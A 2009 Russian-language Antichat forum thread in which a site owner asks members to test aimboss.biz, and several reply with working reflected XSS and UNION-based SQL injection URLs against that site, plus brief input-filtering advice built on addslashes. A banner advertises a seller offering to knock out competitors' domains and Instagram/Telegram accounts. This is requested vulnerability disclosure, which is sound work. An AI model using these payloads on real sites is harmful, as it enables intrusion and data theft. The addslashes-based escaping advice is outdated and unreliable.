Форум АНТИЧАТ

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Проверка на уязвимости
aimboss.biz

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

aimboss.biz

22.06.2009, 10:49

DECIDE

Новичок

Регистрация: 16.06.2009

Сообщений: 25

Провел на форуме:
26624

Репутация: 1

aimboss.biz

Пожалуйста проверьте мой сайт на уязвимости
если необходимо начислю кредитов и опишу возможности которых очень много и нужно всё отладить
Заранее спасибо!

22.06.2009, 11:17

BlackSun

Members of Antichat - Level 5

Регистрация: 01.04.2007

Сообщений: 1,268

Провел на форуме:
10046345

Репутация: 4589

Пассивная XSS
http://aimboss.biz/?nvg=/user:<script>alert()</script>
http://aimboss.biz/?nvg=s-jsip:pinfo:</title></head><body><img src=.+onerror=alert()><!--
http://aimboss.biz/?nvg=t:message:"><script>alert()</script><!--

SQL-INJ
http://aimboss.biz/?nvg=/user::-1+union+select+concat_ws(0x3a,user(),version()),2, 3+--+
http://aimboss.biz/?nvg=weblog:pages:1,1,4,-1'+OR+1=1+--+
http://aimboss.biz/?nvg=s-jsip:pinfo:-1'+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(), version()),8+--+

Последний раз редактировалось BlackSun; 22.06.2009 в 11:48..

22.06.2009, 11:20

wildshaman

Постоянный

Регистрация: 16.04.2008

Сообщений: 889

Провел на форуме:
12942062

Репутация: 1550

Отправить сообщение для wildshaman с помощью ICQ

Пассивка:
http://aimboss.biz/?nvg=casino:rally:run"><script>alert()</script>

по-моему, она там везде

22.06.2009, 11:55

DECIDE

Новичок

Регистрация: 16.06.2009

Сообщений: 25

Провел на форуме:
26624

Репутация: 1

спасибо, буду исправлять
ЗЫ. а как сделали столько много.. в онлайне?

BlackSun: хз, побочные эффекты

это понятно что это только цветочки.., главное что указали на то как не стоит делать, и что надо фильтровать Get запросы

BlackSun: фильровать надо всё, _GET, _POST, _COOKIE, _FILES, и тп. Все данные от пользователей.

Последний раз редактировалось BlackSun; 22.06.2009 в 12:24..

22.06.2009, 12:21

BlackSun

Members of Antichat - Level 5

Регистрация: 01.04.2007

Сообщений: 1,268

Провел на форуме:
10046345

Репутация: 4589

Продолжу в этом посте ..

SQL-INJ, http://aimboss.biz/?nvg=!site:z:usr
В поле ник:

Цитата:

%' union select 1,concat_ws(0x3a,user(),version()),3,4 -- -

Вывод в последней записи

http://aimboss.biz/?nvg=t:vfile:-1'+union+select+1,2,3,4,concat_ws(0x3a,user(),vers ion())+--+

Последний раз редактировалось BlackSun; 22.06.2009 в 12:31..

22.06.2009, 12:26

nemaniak

Участник форума

Регистрация: 10.06.2008

Сообщений: 201

Провел на форуме:
1174919

Репутация: 229

Вот еще парочка...
http://aimboss.biz/?nvg=weblog:myblogs:-211+union+select+1,2,3,4,concat_ws(char(58),user() ,database(),version()),6,7,8,9,10,11,12,13,14--

http://aimboss.biz/?nvg=weblog:<script>alert()</script>

вообщем все баги идентичны

22.06.2009, 12:36

BlackSun

Members of Antichat - Level 5

Регистрация: 01.04.2007

Сообщений: 1,268

Провел на форуме:
10046345

Репутация: 4589

Короче, думаю дальше уже нет смысла копать, идите на полную доработку, фильтрации нет вообще нигде. Потом уже действительно на проверку.

22.06.2009, 12:43

DECIDE

Новичок

Регистрация: 16.06.2009

Сообщений: 25

Провел на форуме:
26624

Репутация: 1

как лучше производить фильтрацию?
от JS
strip_tags()
а от SQL-INJ
как можно обезопасится?

сегодня-завтра постараюсь всё исправить и надеюсь на дельнейшую помошь в поиске уязвимостей

ЗЫ. ещё как сделали столько много в онлайне, что именно делалось? такого не должно быть чтобы один и тотже пользователь выводился более 200 раз в онлайне..

Последний раз редактировалось DECIDE; 22.06.2009 в 12:49..

22.06.2009, 12:50

BlackSun

Members of Antichat - Level 5

Регистрация: 01.04.2007

Сообщений: 1,268

Провел на форуме:
10046345

Репутация: 4589

addslashes(), inval(), маны по пыху в помошь. Есстественно, если в параметре может быть только число, то лучше использовать intval(), а не addslashes.

Цитата:

ЗЫ. ещё как сделали столько много в онлайне, что именно делалось? такого не должно быть чтобы один и тотже пользователь выводился более 200 раз в онлайне..

Оно как то само))